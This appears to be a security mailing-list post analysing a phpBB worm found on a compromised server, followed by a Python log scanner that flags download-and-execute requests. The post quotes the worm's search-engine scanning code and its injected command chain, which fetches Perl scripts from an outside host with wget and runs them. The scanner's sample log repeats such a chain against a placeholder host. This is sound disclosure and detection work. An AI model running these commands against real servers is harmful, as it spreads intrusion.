Hello,

I discovered tonight that a copy of the PHPBB worm had broken in through a script a customer was running and was busy running around googling and generating lists of sites. There have been a couple of intrusions, but they appear to be the same version. I thought I'd pass on the files that were on the server in case anyone is interested.

The processes that were left running were called:

    /usr/local/sbin/httpd - spy

which is the process name from php.txt:

    my $processo = "/usr/local/sbin/httpd - spy";

This file contains the component that talks to Google:

    $procura = 'inurl:*.php?*=' . $numr;
    for($n=0;$n<900;$n += 10){
        $sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort => 80, Proto => "tcp") or next;
        print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";

and then parses the results for URLs :)

It also gets them from Yahoo!:

    for($cadenu=1;$cadenu <= 991; $cadenu +=10){
        @cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next;

The basis for all of these worms is:

    $lista1 = 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt';

I've included copies of these in the tarball so people can look for themselves :)

Happy holidays.

Colin.

--
If jugglers juggle. And Smugglers smuggle. Then what else can a snuggler do :)
Attachment:
phpbbworm.tar.gz
Description: application/tar-gz
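The `cmd=cd /tmp;wget ...;perl ...` chain quoted in the post is the part a web server operator can actually spot in access logs. The following is an added detection example, not code from the post or from the worm: it parses common-log-format lines, undoes repeated URL-encoding (the chain is often double-encoded), and flags any request whose decoded URL contains a fetch tool followed by an interpreter run. The log lines and the `www.example.invalid` host are constructed samples.

```python
import re
from urllib.parse import unquote

# Common log format: ip ident user [timestamp] "METHOD url PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Download-then-execute chain as seen in the worm's cmd= payload:
# a fetch tool with an argument, then ; | or & and an interpreter.
CHAIN_RE = re.compile(r'(wget|curl|fetch)\s+\S+.*[;|&]\s*(perl|sh|bash|php)\b', re.IGNORECASE)

# Constructed sample log (not from the original post). The second line carries
# a double-encoded chain "cd /tmp;wget .../spybot.txt;perl spybot.txt";
# the third merely mentions "wget" and must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Dec/2004:22:10:01 +0000] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 5120
203.0.113.9 - - [24/Dec/2004:22:10:07 +0000] "GET /forum/index.php?cmd=cd%2520/tmp%253Bwget%2520www.example.invalid/spybot.txt%253Bperl%2520spybot.txt HTTP/1.1" 200 5120
203.0.113.7 - - [24/Dec/2004:22:10:09 +0000] "GET /download.php?tool=wget HTTP/1.1" 200 800
"""


def fully_decode(s, rounds=3):
    """Apply unquote() until the string stops changing (bounded), so %253B -> %3B -> ;"""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not CLF."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_requests(log_text):
    """Return one record per request whose decoded URL contains a fetch->execute chain."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        m = CHAIN_RE.search(fully_decode(rec["url"]))
        if m:
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "url": rec["url"], "chain": m.group(0)})
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} -> {hit['chain']}")
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file contents; each hit shows the decoded fetch-and-run chain so the source host and dropped file names can be pulled from it.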